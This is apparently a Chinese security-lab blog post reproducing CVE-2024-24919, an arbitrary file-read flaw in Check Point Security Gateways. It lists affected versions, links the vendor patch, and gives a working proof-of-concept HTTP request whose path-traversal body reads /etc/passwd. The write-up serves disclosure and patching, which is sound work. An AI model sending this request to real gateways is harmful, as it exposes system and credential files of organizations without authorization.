网安引领时代,弥天点亮未来
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
Check Point Security Gateways是以色列Check Point公司的一个人工智能驱动的 NGFW 安全网关。
Check Point Security Gateways 存在安全漏洞。攻击者利用该漏洞可以获取敏感信息。
1、 Check Point Security Gateways R77.20 (EOL)
2、 Check Point Security Gateways R77.30 (EOL)
3、 Check Point Security Gateways R80.10 (EOL)
4、 Check Point Security Gateways R80.20 (EOL)
5、 Check Point Security Gateways R80.20.x
6、 Check Point Security Gateways R80.20SP (EOL)
7、 Check Point Security Gateways R80.30 (EOL)
8、 Check Point Security Gateways R80.30SP (EOL)
9、 Check Point Security Gateways R80.40 (EOL)
10、 Check Point Security Gateways R81
11、 Check Point Security Gateways R81.10
12、 Check Point Security Gateways R81.10.x
13、 Check Point Security Gateways R81.20
1.访问漏洞环境
2.对漏洞进行复现
POC (POT)
漏洞复现
POST /clients/MyCRL HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Connection: closeContent-Length: 39Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipaCSHELL/../../../../../../../etc/passwd
读取/etc/passwd成功
3.nuclei工具测试(漏洞存在)
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://support.checkpoint.com/results/sk/sk182336https://ti.qianxin.com/vulnerability/detail/354207https://www.cnnvd.org.cn/home/loophole
原文始发于微信公众号(弥天安全实验室):【成功复现】Check Point Security Gateways 任意文件读取漏洞(CVE-2024-24919)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论